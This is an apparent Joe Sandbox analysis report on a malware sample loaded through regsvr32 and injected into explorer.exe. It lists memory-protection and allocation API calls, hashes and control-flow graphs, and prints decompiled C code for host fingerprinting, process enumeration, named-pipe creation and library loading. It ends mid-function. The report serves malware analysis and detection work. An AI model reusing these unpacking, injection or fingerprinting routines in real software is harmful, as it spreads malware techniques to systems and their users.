                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000010.00000002.606433354.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000010.00000002.606383541.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000010.00000002.606383541.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: explorer.exe PID: 448 Parent PID: 2600 explorer.exeCOMMON

                  Executed Functions

                  Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}






                  0x00085a61
                  0x00085a6d
                  0x00085a73
                  0x00085a7a

                  APIs
                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ExceptionHandlerVectored
                  • String ID:
                  • API String ID: 3310709589-0
                  • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                  • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084A0B, Relevance: 10.8, APIs: 7, Instructions: 285stringpipeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 84a0b-84a3f memset 1 84a5b-84a64 call 8bb8d 0->1 2 84a41-84a57 0->2 6 84a7f-84ae0 call 8b7a8 call 8b67d call 849c7 call 8c379 call 8d400 call 8b88a call 82c8f 1->6 7 84a66-84a71 call 82ba4 1->7 2->1 26 84aea-84b09 call 892e5 6->26 27 84ae2-84ae5 6->27 10 84a76-84a79 7->10 10->6 13 84d64 10->13 15 84d66-84d6c 13->15 30 84b0b-84b13 26->30 31 84b5e-84b63 26->31 27->13 32 84b51-84b53 30->32 33 84b15-84b4f call 895e1 call 8bfec call 885d5 30->33 34 84b65-84b97 call 8c292 CreateNamedPipeA 31->34 35 84bc6-84bdb call 891e3 * 2 31->35 32->31 38 84b55-84b59 call 8e286 32->38 33->38 46 84b99-84ba9 call 8861a 34->46 47 84bae-84bc4 call 8861a 34->47 54 84be0-84c01 call 89b43 35->54 38->31 46->15 47->54 54->13 60 84c07-84c49 call 89f48 call 89f6c call 8a0ab 54->60 67 84c4b-84c4d call 8a3ed 60->67 68 84c52-84c57 60->68 67->68 70 84c59-84c5b call 8a3ed 68->70 71 84c60-84c7d call 8980c call 8a0ab 68->71 70->71 76 84c82-84c8a 71->76 77 84c8c-84c98 76->77 78 84cb2-84cbf 76->78 79 84c9a 77->79 80 84cdd-84ce4 77->80 81 84cc9-84cd6 call 8fc1f 78->81 82 84cc1-84cc7 78->82 83 84ca0-84ca2 call 8553f 79->83 85 84cee-84cfe call 852c0 80->85 86 84ce6-84ce9 call 8e23e 80->86 92 84ca7-84ca9 81->92 82->83 83->92 93 84d00-84d0c 85->93 94 84d55-84d5a 85->94 86->85 95 84cd8 92->95 96 84cab 92->96 97 84d4d-84d4f lstrcpyW 93->97 98 84d0e-84d4b call 8109a lstrcpyW call 885d5 lstrcatW * 3 93->98 99 84d5c-84d60 94->99 100 84d62 94->100 95->80 96->78 97->94 98->94 99->100 100->13
                  C-Code - Quality: 80%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x40fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x40f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}





























































                  0x00084a0b
                  0x00084a18
                  0x00084a23
                  0x00084a28
                  0x00084a2a
                  0x00084a2d
                  0x00084a32
                  0x00084a35
                  0x00084a3f
                  0x00084a41
                  0x00084a4e
                  0x00084a57
                  0x00084a57
                  0x00084a64
                  0x00084a7f
                  0x00084a86
                  0x00084a88
                  0x00084a8d
                  0x00084a92
                  0x00084a98
                  0x00084aa7
                  0x00084ac6
                  0x00084ac8
                  0x00084ace
                  0x00084ad4
                  0x00084ad9
                  0x00084add
                  0x00084ae0
                  0x00084aea
                  0x00084aec
                  0x00084aed
                  0x00084af8
                  0x00084afa
                  0x00084afd
                  0x00084b02
                  0x00084b09
                  0x00084b5e
                  0x00084b5e
                  0x00084b63
                  0x00084bca
                  0x00084bcf
                  0x00084bd1
                  0x00084bdb
                  0x00084be0
                  0x00084be0
                  0x00084bf5
                  0x00084bfa
                  0x00084bfc
                  0x00084bff
                  0x00084c01
                  0x00000000
                  0x00000000
                  0x00084c07
                  0x00084c11
                  0x00084c1a
                  0x00084c1f
                  0x00084c22
                  0x00084c28
                  0x00084c2e
                  0x00084c36
                  0x00084c38
                  0x00084c3b
                  0x00084c3c
                  0x00084c41
                  0x00084c44
                  0x00084c47
                  0x00084c49
                  0x00084c4d
                  0x00084c4d
                  0x00084c52
                  0x00084c55
                  0x00084c57
                  0x00084c5b
                  0x00084c5b
                  0x00084c62
                  0x00084c67
                  0x00084c69
                  0x00084c6d
                  0x00084c6f
                  0x00084c75
                  0x00084c79
                  0x00084c7c
                  0x00084c7d
                  0x00084c82
                  0x00084c85
                  0x00084c8a
                  0x00084cb2
                  0x00084cb8
                  0x00084cbf
                  0x00084cce
                  0x00084cd3
                  0x00000000
                  0x00084cd3
                  0x00084cc1
                  0x00000000
                  0x00084c8c
                  0x00084c8c
                  0x00084c91
                  0x00084c98
                  0x00084cdd
                  0x00084cdd
                  0x00084ce4
                  0x00084ce8
                  0x00084ce9
                  0x00084ce9
                  0x00084cf3
                  0x00084cf8
                  0x00084cfb
                  0x00084cfc
                  0x00084cfe
                  0x00084d00
                  0x00084d05
                  0x00084d0c
                  0x00084d4f
                  0x00084d0e
                  0x00084d13
                  0x00084d1b
                  0x00084d1f
                  0x00084d2a
                  0x00084d35
                  0x00084d3d
                  0x00084d41
                  0x00084d49
                  0x00084d49
                  0x00084d0c
                  0x00084d55
                  0x00084d58
                  0x00084d5a
                  0x00084d60
                  0x00084d60
                  0x00084d62
                  0x00084d62
                  0x00000000
                  0x00084d62
                  0x00084c9a
                  0x00084c9a
                  0x00084ca0
                  0x00084ca2
                  0x00084ca7
                  0x00084ca7
                  0x00084ca9
                  0x00084cd8
                  0x00000000
                  0x00084cd8
                  0x00084cab
                  0x00084ae4
                  0x00084ae4
                  0x00000000
                  0x00084ae4
                  0x00084c8a
                  0x00084b69
                  0x00084b77
                  0x00084b8f
                  0x00084b95
                  0x00084b97
                  0x00084baf
                  0x00084bb4
                  0x00084bbd
                  0x00084bc3
                  0x00000000
                  0x00084bc3
                  0x00084b9f
                  0x00084ba8
                  0x00000000
                  0x00084ba8
                  0x00084b0b
                  0x00084b11
                  0x00084b13
                  0x00084b51
                  0x00084b53
                  0x00000000
                  0x00000000
                  0x00084b55
                  0x00084b59
                  0x00000000
                  0x00084b59
                  0x00084b15
                  0x00084b1f
                  0x00084b2b
                  0x00084b36
                  0x00084b3d
                  0x00084b47
                  0x00084b4c
                  0x00000000
                  0x00084b4c
                  0x00084ae2
                  0x00000000
                  0x00084a66
                  0x00084a71
                  0x00084a77
                  0x00084a79
                  0x00084d64
                  0x00084d64
                  0x00084d66
                  0x00084d6c
                  0x00084d6c
                  0x00000000
                  0x00084a79

                  APIs
                  • memset.MSVCRT ref: 00084A2D
                  • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
                  • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
                  • lstrcatW.KERNEL32 ref: 00084D3D
                  • lstrcatW.KERNEL32 ref: 00084D41
                  • lstrcatW.KERNEL32 ref: 00084D49
                  • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$CreateNamedPipememset
                  • String ID:
                  • API String ID: 2307407751-0
                  • Opcode ID: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}















                  0x0008b7a8
                  0x0008b7b1
                  0x0008b7bd
                  0x0008b7c3
                  0x0008b7c5
                  0x0008b7cd
                  0x0008b7e0
                  0x0008b7ef
                  0x0008b7fa
                  0x0008b807
                  0x0008b821
                  0x0008b826
                  0x0008b828
                  0x0008b82f
                  0x0008b83f
                  0x0008b850
                  0x0008b85a
                  0x0008b862
                  0x0008b869
                  0x0008b86c
                  0x0008b889

                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                  • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                  0x0008cf87
                  0x0008cf89
                  0x0008cf90
                  0x0008cf98
                  0x0008cfa2
                  0x0008cfa2
                  0x0008cfa8
                  0x0008cfb1
                  0x0008cfb7
                  0x0008cfb9
                  0x0008cfbd
                  0x0008cfbd
                  0x0008cfc2
                  0x0008cfc8
                  0x0008cfd8
                  0x0008cfe2
                  0x0008cfea
                  0x0008cfed
                  0x0008cff9
                  0x0008cfff
                  0x0008d004
                  0x0008d00a
                  0x0008d010
                  0x0008d016
                  0x0008d01e

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 134 9249b-924a9 135 924ab-924ae 134->135 136 924b3-924f3 GetModuleHandleA call 8e099 134->136 137 92660-92661 135->137 140 924f9-92510 136->140 141 9265e 136->141 142 92513-9251a 140->142 141->137 143 9251c-92525 142->143 144 92527-92537 142->144 143->142 145 9253a-92541 144->145 145->141 146 92547-9255e LoadLibraryA 145->146 147 92568-9256e 146->147 148 92560-92563 146->148 149 9257d-92586 147->149 150 92570-9257b 147->150 148->137 151 92589 149->151 150->151 152 9258d-92593 151->152 153 92599-925b1 152->153 154 92650-92659 152->154 155 925b3-925d2 153->155 156 925d4-92602 153->156 154->145 159 92605-9260b 155->159 156->159 160 92639-9264b 159->160 161 9260d-9261b 159->161 160->152 162 9261d-9262f 161->162 163 92631-92637 161->163 162->160 163->160
                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
